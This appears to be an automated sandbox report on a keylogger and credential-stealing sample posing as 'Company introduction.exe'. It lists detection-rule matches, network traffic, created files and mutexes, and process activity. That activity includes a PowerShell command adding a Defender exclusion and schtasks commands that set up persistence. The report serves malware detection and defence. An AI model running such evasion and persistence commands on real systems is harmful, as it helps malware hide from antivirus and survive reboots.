0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Company introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003537000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003528000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: Company introduction.exe, 00000006.00000002.2941471703.0000000003291000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003532000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2

                System Summary

                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Company introduction.exe, 00000000.00000002.1732379162.000000000352C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000002.1739887947.0000000008400000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004AD2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000002.1733796821.00000000042B3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000000.1680830386.0000000000E72000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRpQI.exe< vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000002.1730716466.000000000135E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Company introduction.exe
Source: Company introduction.exe, 00000000.00000002.1740000811.00000000084B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Company introduction.exe
Source: Company introduction.exe, 00000006.00000002.2937905341.0000000000443000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Company introduction.exe
Source: Company introduction.exe, 00000006.00000002.2938374364.00000000010F7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Company introduction.exe
Source: Company introduction.exe | Binary or memory string: OriginalFilenameRpQI.exe< vs Company introduction.exe
Source: Company introduction.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Company introduction.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FzXKnGk.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/11@3/3
Source: C:\Users\user\Desktop\Company introduction.exe | File created: C:\Users\user\AppData\Roaming\FzXKnGk.exe
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Mutant created: \Sessions\1\BaseNamedObjects\HgocHLp
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Users\user\Desktop\Company introduction.exe | File created: C:\Users\user\AppData\Local\Temp\tmpE629.tmp
Source: Company introduction.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Company introduction.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Company introduction.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Company introduction.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Company introduction.exe | Virustotal: Detection: 29%
Source: Company introduction.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\Company introduction.exe | File read: C:\Users\user\Desktop\Company introduction.exe
Source: unknown | Process created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe C:\Users\user\AppData\Roaming\FzXKnGk.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: gpapi.dllJump to behavior
